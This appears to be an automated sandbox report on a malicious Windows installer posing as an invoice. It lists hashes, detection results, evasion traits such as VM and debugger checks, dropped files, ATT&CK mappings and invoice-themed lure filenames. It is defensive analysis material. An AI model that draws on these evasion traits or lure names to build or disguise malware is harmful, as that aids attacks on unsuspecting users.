Analysis Report Invoice 6500TH21Y5674.exe

Overview

General Information

Sample Name: Invoice 6500TH21Y5674.exe
Analysis ID: 356249
MD5: dc22d7783144cfe4dcbb4734ed6a3656
SHA1: 65d3e4f4df34bb25f7b621dd0457c641f98029cb
SHA256: c9fc9a54366452a99c7ed753c7f5055141bc579b1a2530f8db7d7a039db6225d
Tags: exe

Detection

Score: 72
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Executable has a suspicious name (potential lure to open the executable)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for dropped file
Machine Learning detection for sample
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Detected potential crypto function
Drops PE files
One or more processes crash
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Startup

  • System is w10x64
  • Invoice 6500TH21Y5674.exe (PID: 6928 cmdline: 'C:\Users\user\Desktop\Invoice 6500TH21Y5674.exe' MD5: DC22D7783144CFE4DCBB4734ED6A3656)
    • WerFault.exe (PID: 7116 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6928 -s 736 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\ir9ehshgyir.dll, Virustotal: Detection: 33%
Source: C:\Users\user\AppData\Local\Temp\ir9ehshgyir.dll, ReversingLabs: Detection: 28%
Multi AV Scanner detection for submitted file
Source: Invoice 6500TH21Y5674.exe, ReversingLabs: Detection: 53%
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\ir9ehshgyir.dll, Joe Sandbox ML: detected
Machine Learning detection for sample
Source: Invoice 6500TH21Y5674.exe, Joe Sandbox ML: detected

Compliance:

Uses 32bit PE files
Source: Invoice 6500TH21Y5674.exe, Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Contains modern PE file flags such as dynamic base (ASLR) or NX
Source: Invoice 6500TH21Y5674.exe, Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Binary contains paths to debug symbols
Source: C:\Users\user\Desktop\Invoice 6500TH21Y5674.exe, Code function: 0_2_00406448 FindFirstFileA,FindClose,0_2_00406448
Source: C:\Users\user\Desktop\Invoice 6500TH21Y5674.exe, Code function: 0_2_0040589C GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_0040589C
Source: C:\Users\user\Desktop\Invoice 6500TH21Y5674.exe, Code function: 0_2_004027A1 FindFirstFileA,0_2_004027A1
Source: Invoice 6500TH21Y5674.exe, String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: Invoice 6500TH21Y5674.exe, String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: C:\Users\user\Desktop\Invoice 6500TH21Y5674.exe, Code function: 0_2_00405339 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405339

System Summary:

Executable has a suspicious name (potential lure to open the executable)
Source: Invoice 6500TH21Y5674.exe, Static file information: Suspicious name
Initial sample is a PE file and has a suspicious name
Source: initial sample, Static PE information: Filename: Invoice 6500TH21Y5674.exe
Source: C:\Users\user\Desktop\Invoice 6500TH21Y5674.exe, Code function: 0_2_00403325 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403325
Source: C:\Users\user\Desktop\Invoice 6500TH21Y5674.exe, Code function: 0_2_72AB1A98,0_2_72AB1A98
Source: unknown, Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6928 -s 736
Source: Invoice 6500TH21Y5674.exe, 00000000.00000002.687423343.0000000000D40000.00000002.00000001.sdmp, Binary or memory string: OriginalFilenameuser32j% vs Invoice 6500TH21Y5674.exe
Source: Invoice 6500TH21Y5674.exe, 00000000.00000002.686919527.0000000000950000.00000002.00000001.sdmp, Binary or memory string: OriginalFilenameOLEACCRC.DLLj% vs Invoice 6500TH21Y5674.exe
Source: classification engine, Classification label: mal72.winEXE@2/7@0/0
Source: C:\Users\user\Desktop\Invoice 6500TH21Y5674.exe, Code function: 0_2_004045EA GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_004045EA
Source: C:\Users\user\Desktop\Invoice 6500TH21Y5674.exe, Code function: 0_2_0040216B CoCreateInstance,MultiByteToWideChar,0_2_0040216B
Source: C:\Windows\SysWOW64\WerFault.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6928
Source: C:\Users\user\Desktop\Invoice 6500TH21Y5674.exe, File created: C:\Users\user\AppData\Local\Temp\nsh10FD.tmp
Source: Invoice 6500TH21Y5674.exe, Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Invoice 6500TH21Y5674.exe, File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\Invoice 6500TH21Y5674.exe, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\SysWOW64\WerFault.exe, File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\Invoice 6500TH21Y5674.exe, File read: C:\Users\user\Desktop\Invoice 6500TH21Y5674.exe
Source: unknown, Process created: C:\Users\user\Desktop\Invoice 6500TH21Y5674.exe 'C:\Users\user\Desktop\Invoice 6500TH21Y5674.exe'
Source: C:\Users\user\Desktop\Invoice 6500TH21Y5674.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: C:\Users\user\Desktop\Invoice 6500TH21Y5674.exe, Code function: 0_2_72AB1A98 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,0_2_72AB1A98
Source: C:\Users\user\Desktop\Invoice 6500TH21Y5674.exe, Code function: 0_2_72AB2F60 push eax; ret 0_2_72AB2F8E
Source: initial sample, Static PE information: section name: .data entropy: 7.27709924336
Source: C:\Users\user\Desktop\Invoice 6500TH21Y5674.exe, File created: C:\Users\user\AppData\Local\Temp\nsb112C.tmp\System.dll
Source: C:\Users\user\Desktop\Invoice 6500TH21Y5674.exe, File created: C:\Users\user\AppData\Local\Temp\ir9ehshgyir.dll
Source: C:\Users\user\Desktop\Invoice 6500TH21Y5674.exe, Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe, Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe, Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Invoice 6500TH21Y5674.exe, File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: WerFault.exe, 00000005.00000002.685752998.00000000052D0000.00000002.00000001.sdmp, Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: WerFault.exe, 00000005.00000002.685487977.0000000004D00000.00000004.00000001.sdmp, Binary or memory string: Hyper-V RAW
Source: WerFault.exe, 00000005.00000002.685752998.00000000052D0000.00000002.00000001.sdmp, Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: WerFault.exe, 00000005.00000002.685752998.00000000052D0000.00000002.00000001.sdmp, Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: WerFault.exe, 00000005.00000002.685752998.00000000052D0000.00000002.00000001.sdmp, Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Users\user\Desktop\Invoice 6500TH21Y5674.exe, Process queried: DebugPort
Source: C:\Users\user\Desktop\Invoice 6500TH21Y5674.exe, Code function: 0_2_10003111 LdrInitializeThunk,0_2_10003111
Source: C:\Users\user\Desktop\Invoice 6500TH21Y5674.exeCode function: 0_2_72AB1A98 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,0_2_72AB1A98
Source: C:\Users\user\Desktop\Invoice 6500TH21Y5674.exeCode function: 0_2_1000410A mov eax, dword ptr fs:[00000030h]0_2_1000410A
Source: C:\Users\user\Desktop\Invoice 6500TH21Y5674.exeCode function: 0_2_10003F0F mov eax, dword ptr fs:[00000030h]0_2_10003F0F
Source: C:\Users\user\Desktop\Invoice 6500TH21Y5674.exeCode function: 0_2_00403325 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403325

Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Native API 1 | Path Interception | Access Token Manipulation 1 | Virtualization/Sandbox Evasion 2 | OS Credential Dumping | Security Software Discovery 121 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | System Shutdown/Reboot 1
Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Process Injection 1 | Access Token Manipulation 1 | LSASS Memory | Virtualization/Sandbox Evasion 2 | Remote Desktop Protocol | Clipboard Data 1 | Exfiltration Over Bluetooth | Junk Data | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Process Injection 1 | Security Account Manager | Remote System Discovery 1 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Steganography | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Obfuscated Files or Information 2 | NTDS | File and Directory Discovery 2 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Software Packing 1 | LSA Secrets | System Information Discovery 3 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
Invoice 6500TH21Y5674.exe | 53% | ReversingLabs | Win32.Trojan.Wacatac
Invoice 6500TH21Y5674.exe | 100% | Joe Sandbox ML |

Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\ir9ehshgyir.dll | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\ir9ehshgyir.dll | 33% | Virustotal |
C:\Users\user\AppData\Local\Temp\ir9ehshgyir.dll | 3% | Metadefender |
C:\Users\user\AppData\Local\Temp\ir9ehshgyir.dll | 29% | ReversingLabs | Win32.Trojan.Convagent
C:\Users\user\AppData\Local\Temp\nsb112C.tmp\System.dll | 0% | Virustotal |
C:\Users\user\AppData\Local\Temp\nsb112C.tmp\System.dll | 0% | Metadefender |
C:\Users\user\AppData\Local\Temp\nsb112C.tmp\System.dll | 0% | ReversingLabs |

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://nsis.sf.net/NSIS_Error | Invoice 6500TH21Y5674.exe | false | | high
http://nsis.sf.net/NSIS_ErrorError | Invoice 6500TH21Y5674.exe | false | | high

      Contacted IPs

      No contacted IP infos

      General Information

      Joe Sandbox Version:31.0.0 Emerald
      Analysis ID:356249
      Start date:22.02.2021
      Start time:20:18:39
      Joe Sandbox Product:CloudBasic
      Overall analysis duration:0h 5m 42s
      Hypervisor based Inspection enabled:false
      Report type:full
      Sample file name:Invoice 6500TH21Y5674.exe
      Cookbook file name:default.jbs
      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
      Run name:Run with higher sleep bypass
      Number of analysed new started processes analysed:19
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • HDC enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Detection:MAL
      Classification:mal72.winEXE@2/7@0/0
      EGA Information:Failed
      HDC Information:
      • Successful, ratio: 70% (good quality ratio 69%)
      • Quality average: 88.2%
      • Quality standard deviation: 21.2%
      HCA Information:Failed
      Cookbook Comments:
      • Adjust boot time
      • Enable AMSI
      • Sleeps bigger than 120000ms are automatically reduced to 1000ms
      • Found application associated with file extension: .exe
      • Stop behavior analysis, all processes terminated
      Warnings:
      • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, WerFault.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
      • Excluded IPs from analysis (whitelisted)
      • Excluded domains from analysis (whitelisted)

      Simulations

      Behavior and APIs

      No simulations

      Joe Sandbox View / Context

      IPs

      No context

      Domains

      No context

      ASN

      No context

      JA3 Fingerprints

      No context

      Dropped Files

      Match: C:\Users\user\AppData\Local\Temp\nsb112C.tmp\System.dll
      Associated Sample Name / URL | Detection
      Invoice 6500TH21Y5674.exe | malicious
      GPP.exe | malicious
      OrderSuppliesQuote0817916.exe | malicious
      ACCOUNT DETAILS.exe | malicious
      Quotation.com.exe | malicious
      Unterlagen PDF.exe | malicious
      QuotationInvoices.exe | malicious
      PO.exe | malicious
      SecuriteInfo.com.TrojanSpy.MSIL.Agent.22886.exe | malicious
      SecuriteInfo.com.FileRepMalware.24882.exe | malicious
      PDF_doc.exe | malicious
      09000000000000.jar | malicious
      quotation10204168.dox.xlsx | malicious
      notice of arrivalpdf.exe | malicious
      R5BNZ68i0f.exe | malicious
      payment.exe | malicious
      notice of arrival.xlsx | malicious
      Invoice Overdue.exe | malicious
      Invoice Overdue.exe | malicious
      CHEQUE COPY RECEIPT.exe | malicious

                                              Created / dropped Files

                                              C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Invoice 6500TH21_a95a9cdbd3868a56584b72cabf593f6f9eaa3187_00d3adf0_1b973ea4\Report.wer
                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                              File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):13168
                                              Entropy (8bit):3.773890261765939
                                              Encrypted:false
                                              SSDEEP:192:NvLU34rLFHBUZMXaYuj7exSA/u7sqS274Itcmeo:lLU34rL1BUZMXaYujI/u7sqX4Itcmeo
                                              MD5:B9A8105BDE3A01D5F56C856A101230A3
                                              SHA1:C6733AFEDB1EC9356EFA1AFE2965F6E45308A8F8
                                              SHA-256:761739947FF5886D6E70676DB774D40C1B7CCAEA3D9E9612DA10F34FD9EB9896
                                              SHA-512:88675EC0371A6C8A4A6E77543A26363A3D3A6AC5467165677CB24942CC77BF185C2647B060BADA747B64325E67047B6EE337C7B2651270F327153612D658BD69
                                              Malicious:false
                                              Reputation:low
                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER231D.tmp.dmp
                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                              File Type:Mini DuMP crash report, 14 streams, Mon Feb 22 19:19:39 2021, 0x1205a4 type
                                              Category:dropped
                                              Size (bytes):66162
                                              Entropy (8bit):2.1563332439998835
                                              Encrypted:false
                                              SSDEEP:384:qlI2YeD8dE4EQAxxA3H10ljr7LnF8Gh7E:ohD8e4ExxA3H10ljr7LnDBE
                                              MD5:3E18A873E93E36A60B274EF695D5F2E9
                                              SHA1:9071A4147E55E48BCE1E35DBA3492581FADABBCB
                                              SHA-256:6F82FD3AF651C2393C97F88543EEBC77AAA4B0C65E1366EF15CFE1E1F76C6743
                                              SHA-512:79FD6DB6FD28373012CA805A4BAD5FC4EDB1A6CD77C04A5A529EC7F60E0BE51AEB54B202B3A106DD668A6D115908270A311D748A3871CD0B0B6B3F0364A841DD
                                              Malicious:false
                                              Reputation:low
                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER2AEE.tmp.WERInternalMetadata.xml
                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                              File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):8344
                                              Entropy (8bit):3.7019413029395705
                                              Encrypted:false
                                              SSDEEP:192:Rrl7r3GLNi6Fs6IRe6YrsSUbsigmfMuSf+pr289bjfsfZAhm:RrlsNi6O6IRe6YQSUbsigmfMuSkjEfZ7
                                              MD5:A891BE51303A267ACB51A284CB6F3668
                                              SHA1:AF4710514288DFAA07818E6E173116968323ECD5
                                              SHA-256:41502FDF20090687C574C502CEDB65E0F6C2351ACEEABA305F41212E09C64B39
                                              SHA-512:F5D8429D0CDE5638E97D6BEBC7E7D944BBAC593270601C64ABF5B108A6920B02AA7290C136FAB99575EE5C79A3FF314AAC2E945D75B1D41C8E7115055B8C3454
                                              Malicious:false
                                              Reputation:low
                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER2CA5.tmp.xml
                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):4623
                                              Entropy (8bit):4.4833358782904815
                                              Encrypted:false
                                              SSDEEP:48:cvIwSD8zs/JgtWI9/HWSC8BQ/8fm8M4JslB7qNuGFxt+q8Pn7623fS2OXivei0d:uITfh82SNjJk7dyte71PS2OSvJ0d
                                              MD5:5FFC0A71BC19D54284F6747E18C59EB3
                                              SHA1:F4A411FD3EB3DA53EC9B4E208635E2F3976646CE
                                              SHA-256:BD8919A5D39364FA78A4D8F9CFBD8549731DA6553F772527BECB2D48392E8EB7
                                              SHA-512:EDC6FFB38BB75D117388F7E32A82259E43B249FC378D11299FB464DB976BC5B50B59B8685680B43B269C6B4971E2BFCB2C2338CA10C657D9CF79E5D73606C816
                                              Malicious:false
                                              Reputation:low
                                              C:\Users\user\AppData\Local\Temp\csnalztt.zl
                                              Process:C:\Users\user\Desktop\Invoice 6500TH21Y5674.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):164864
                                              Entropy (8bit):7.998912168321662
                                              Encrypted:true
                                              SSDEEP:3072:vjvBirrhYZ6EhU+VR/zSRz3DInq5u+bFGLESasrlOqs621Ov4hrjlg:vjvBA+ESZBzSRz3DwNAHsr47x1Ov4h6
                                              MD5:56F7AC02D44E2C397DD1290AA89650A8
                                              SHA1:790FD108F1870FA972269CB1F8B2DEB71EB7CACA
                                              SHA-256:6A2E176536A074D8B73F52CA163CD414685662FF9372E964D075DA84E3F9A3EC
                                              SHA-512:5904B945CF35CB93CE6CE28608CC7A1689696DFD0AA217B153EBF3057C84B0F6B70B4AD4DBAC106D161C77B7E7B8A96B79175EBEFF2D1CB7AC119E92D0C02161
                                              Malicious:false
                                              Reputation:low
                                              C:\Users\user\AppData\Local\Temp\ir9ehshgyir.dll
                                              Process:C:\Users\user\Desktop\Invoice 6500TH21Y5674.exe
                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                              Category:dropped
                                              Size (bytes):8192
                                              Entropy (8bit):6.36613341806139
                                              Encrypted:false
                                              SSDEEP:96:WkB+SnWJ9nZE0vhI2B3cubTsVoeMzr+o1s0klKGIvxzj13IDmZU7ukhMAzN+2:W4T0vhtlbDklKGM13y37ukhp+
                                              MD5:27352D6A2DA80C7A04C0A589E7F025BD
                                              SHA1:500B490B02EE59DEEE00FEB4C59A9F0308464E5C
                                              SHA-256:427AB077A32D2844F5E82A1D0C52B9FA73BB58298DC70B3D3A55BA05552DD840
                                              SHA-512:5AFC122644CA2D1B2F9594ADF653BE281001C6C4E4D6D31B55950B83C64A1434B63054594B575510A9FA707D33E22624F01E92F5DA2572712E364C7E1C21108B
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              • Antivirus: Virustotal, Detection: 33%
                                              • Antivirus: Metadefender, Detection: 3%
                                              • Antivirus: ReversingLabs, Detection: 29%
                                              Reputation:low
                                              C:\Users\user\AppData\Local\Temp\nsb112C.tmp\System.dll
                                              Process:C:\Users\user\Desktop\Invoice 6500TH21Y5674.exe
                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                              Category:dropped
                                              Size (bytes):11776
                                              Entropy (8bit):5.855045165595541
                                              Encrypted:false
                                              SSDEEP:192:xPtkiQJr7V9r3HcU17S8g1w5xzWxy6j2V7i77blbTc4v:g7VpNo8gmOyRsVc4
                                              MD5:FCCFF8CB7A1067E23FD2E2B63971A8E1
                                              SHA1:30E2A9E137C1223A78A0F7B0BF96A1C361976D91
                                              SHA-256:6FCEA34C8666B06368379C6C402B5321202C11B00889401C743FB96C516C679E
                                              SHA-512:F4335E84E6F8D70E462A22F1C93D2998673A7616C868177CAC3E8784A3BE1D7D0BB96F2583FA0ED82F4F2B6B8F5D9B33521C279A42E055D80A94B4F3F1791E0C
                                              Malicious:false
                                              Antivirus:
                                              • Antivirus: Virustotal, Detection: 0%
                                              • Antivirus: Metadefender, Detection: 0%
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Joe Sandbox View:
                                              • Filename: Invoice 6500TH21Y5674.exe, Detection: malicious
                                              • Filename: GPP.exe, Detection: malicious
                                              • Filename: OrderSuppliesQuote0817916.exe, Detection: malicious
                                              • Filename: ACCOUNT DETAILS.exe, Detection: malicious
                                              • Filename: Quotation.com.exe, Detection: malicious
                                              • Filename: Unterlagen PDF.exe, Detection: malicious
                                              • Filename: QuotationInvoices.exe, Detection: malicious
                                              • Filename: PO.exe, Detection: malicious
                                              • Filename: SecuriteInfo.com.TrojanSpy.MSIL.Agent.22886.exe, Detection: malicious
                                              • Filename: SecuriteInfo.com.FileRepMalware.24882.exe, Detection: malicious
                                              • Filename: PDF_doc.exe, Detection: malicious
                                              • Filename: 09000000000000.jar, Detection: malicious
                                              • Filename: quotation10204168.dox.xlsx, Detection: malicious
                                              • Filename: notice of arrivalpdf.exe, Detection: malicious
                                              • Filename: R5BNZ68i0f.exe, Detection: malicious
                                              • Filename: payment.exe, Detection: malicious
                                              • Filename: notice of arrival.xlsx, Detection: malicious
                                              • Filename: Invoice Overdue.exe, Detection: malicious
                                              • Filename: Invoice Overdue.exe, Detection: malicious
                                              • Filename: CHEQUE COPY RECEIPT.exe, Detection: malicious
                                              Reputation:moderate, very likely benign file

                                              Static File Info

                                              General

                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                              Entropy (8bit):7.888760018796244
                                              TrID:
                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                              • DOS Executable Generic (2002/1) 0.02%
                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                              File name:Invoice 6500TH21Y5674.exe
                                              File size:215032
                                              MD5:dc22d7783144cfe4dcbb4734ed6a3656
                                              SHA1:65d3e4f4df34bb25f7b621dd0457c641f98029cb
                                              SHA256:c9fc9a54366452a99c7ed753c7f5055141bc579b1a2530f8db7d7a039db6225d
                                              SHA512:908395a21d0a9411d8d2839b7c952f1cf50fd1998c5325457913cc27b581719d890919c196460ce5eb9fadba874b40043a537e8e40ff6aac75fd0dffcae7be4c
                                              SSDEEP:6144:7x/MzpANjvBA+ESZBzSRz3DwNAHsr47x1Ov4h9:RcpKjTyR7Dw347xkv4h9

                                              File Icon

                                              Icon Hash:00828e8e8686b000

                                              Static PE Info

                                              General

                                              Entrypoint: 0x403325
                                              Entrypoint Section: .text
                                              Digitally signed: false
                                              Imagebase: 0x400000
                                              Subsystem: windows gui
                                              Image File Characteristics: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                              DLL Characteristics: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                              Time Stamp: 0x5F24D625 [Sat Aug 1 02:40:37 2020 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major: 4
                                              OS Version Minor: 0
                                              File Version Major: 4
                                              File Version Minor: 0
                                              Subsystem Version Major: 4
                                              Subsystem Version Minor: 0
                                              Import Hash: ced282d9b261d1462772017fe2f6972b

                                              Entrypoint Preview

                                              Instruction
                                              sub esp, 00000184h
                                              push ebx
                                              push esi
                                              push edi
                                              xor ebx, ebx
                                              push 00008001h
                                              mov dword ptr [esp+18h], ebx
                                              mov dword ptr [esp+10h], 0040A198h
                                              mov dword ptr [esp+20h], ebx
                                              mov byte ptr [esp+14h], 00000020h
                                              call dword ptr [004080B8h]
                                              call dword ptr [004080BCh]
                                              and eax, BFFFFFFFh
                                              cmp ax, 00000006h
                                              mov dword ptr [007A2F6Ch], eax
                                              je 00007EFDA4D202B3h
                                              push ebx
                                              call 00007EFDA4D23416h
                                              cmp eax, ebx
                                              je 00007EFDA4D202A9h
                                              push 00000C00h
                                              call eax
                                              mov esi, 004082A0h
                                              push esi
                                              call 00007EFDA4D23392h
                                              push esi
                                              call dword ptr [004080CCh]
                                              lea esi, dword ptr [esi+eax+01h]
                                              cmp byte ptr [esi], bl
                                              jne 00007EFDA4D2028Dh
                                              push 0000000Bh
                                              call 00007EFDA4D233EAh
                                              push 00000009h
                                              call 00007EFDA4D233E3h
                                              push 00000007h
                                              mov dword ptr [007A2F64h], eax
                                              call 00007EFDA4D233D7h
                                              cmp eax, ebx
                                              je 00007EFDA4D202B1h
                                              push 0000001Eh
                                              call eax
                                              test eax, eax
                                              je 00007EFDA4D202A9h
                                              or byte ptr [007A2F6Fh], 00000040h
                                              push ebp
                                              call dword ptr [00408038h]
                                              push ebx
                                              call dword ptr [00408288h]
                                              mov dword ptr [007A3038h], eax
                                              push ebx
                                              lea eax, dword ptr [esp+38h]
                                              push 00000160h
                                              push eax
                                              push ebx
                                              push 0079E528h
                                              call dword ptr [0040816Ch]
                                              push 0040A188h

                                              Rich Headers

                                              Programming Language:
                                              • [EXP] VC++ 6.0 SP5 build 8804

                                              Data Directories

                                              Name | Virtual Address | Virtual Size | Is in Section
                                              IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8438 | 0xa0 | .rdata
                                              IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x3ac000 | 0x988 | .rsrc
                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
